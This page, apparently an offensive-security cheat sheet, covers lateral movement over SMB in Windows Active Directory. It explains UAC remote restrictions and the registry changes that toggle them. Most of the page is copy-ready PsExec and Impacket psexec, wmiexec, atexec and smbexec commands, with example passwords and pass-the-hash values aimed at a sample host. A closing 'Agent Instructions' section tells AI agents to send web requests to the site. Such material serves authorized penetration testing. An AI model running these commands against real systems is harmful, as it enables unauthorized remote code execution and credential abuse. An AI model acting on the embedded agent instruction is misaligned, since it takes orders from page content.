# SMB protocol ## Introduction Lateral movement consists of techniques that enable an attacker to access and control remote systems. SMB protocol is a well known candidate for this purpose. ## Requirements ### Definitions There are 5 types of users: * Local users * With admin privileges on the machine * RID500 * Non-RID500 * Without admin privileges on the machine * Domain users * With admin privileges on machines * Without admin privileges on machines {% hint style="info" %} RID500 is the built-in local admin account used for installing or recovering purpose (usually named Administrator). {% endhint %} ### UAC remote restrictions Judging from [microsoft](https://support.microsoft.com/en-us/help/951016/description-of-user-account-control-and-remote-restrictions-in-windows) and [harmj0y](https://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/), we can say following things: * Local admin privileges are **required** to WmiExec or PsExec * Non-RID 500 local admin accounts **cannot** WmiExec or PsExec on WinVista+ machines * Domain users with admin privileges on machine **can** * RID 500 local admin account **can** WmiExec or PsExec on machines | | PsExec, WmiExec, SmbExec, AtExec, etc. | | ----------------------------------------------- | -------------------------------------- | | Local users | No | | Local admins | No | | Local admin RID 500 | **Yes** | | Domain users **without** local admin privileges | No | | Domain users **with** local admin privileges | **Yes** | {% hint style="info" %} **To allow Non-RID 500 local admin accounts performing Wmi or PsExec, execute:** * reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG\_DWORD /f /d 1 **To prevent RID 500 from being able to WmiExec or PsExec, execute:** * reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v FilterAdministratorToken /t REG\_DWORD /f /d 1 {% endhint %} ## Tools ### PsExec On Windows, use Sysinternal's PsExec: ```bash PsExec64.exe \\WIN01 -accepteula -s -u localadmin -p L0c4l4dm1n "cmd" PsExec64.exe \\192.168.10.60 -accepteula -s -u localadmin -p b26906d7457cbe74931011c3c5d1ac92 "cmd" ``` On Kali, use Impacket's PsExec: ```bash psexec.py ./localadmin:L0c4l4dm1n@192.168.10.60 "cmd" psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634 ./aasadmin@192.168.10.60 "cmd" ``` ### WmiExec On Kali, use Impacket's WmiExec: ```bash wmiexec.py ./localadmin:L0c4l4dm1n@192.168.10.60 "ipconfig" wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634 ./aasadmin@192.168.10.60 "ipconfig" ``` ### AtExec On Kali, use Impacket's AtExec: ```bash atexec.py ./localadmin:L0c4l4dm1n@192.168.10.60 "ipconfig" atexec.py -hashes aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634 ./aasadmin@192.168.10.60 "ipconfig" ``` ### SmbExec On Kali, use Impacket's SmbExec: ```bash smbexec.py ./localadmin:L0c4l4dm1n@192.168.10.60 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634 ./aasadmin@192.168.10.60 ``` ## References * [microsoft](https://support.microsoft.com/en-us/help/951016/description-of-user-account-control-and-remote-restrictions-in-windows) * [harmj0y](https://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://aas-s3curity.gitbook.io/cheatsheet/internalpentest/active-directory/post-exploitation/lateral-movement/smb-protocol.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.